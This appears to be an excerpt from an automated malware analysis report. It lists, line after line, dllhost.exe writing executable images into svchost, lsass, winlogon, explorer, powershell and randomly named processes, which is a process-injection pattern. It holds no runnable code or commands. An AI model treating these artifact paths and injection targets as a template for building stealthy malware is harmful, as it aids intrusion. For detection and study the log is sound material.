Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AE14340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1AFE4460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 27C93250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24463CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 227C0130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23A44F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F530850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13376160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 3040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 27B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 21F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 840000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2EA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 15E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 2990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\USuVqesolxpxUCJStCOdxKnPjJXpaPkVtWtYmInjBhHDnRiDrsVhJyJODVfAseiRw\GjVdfFQVrJpirkbij.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C115C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BB497C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26C3DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 262F1DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F46E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\$nya-onimai2\MzWhoQ.exe base: 21F47070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 220557A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
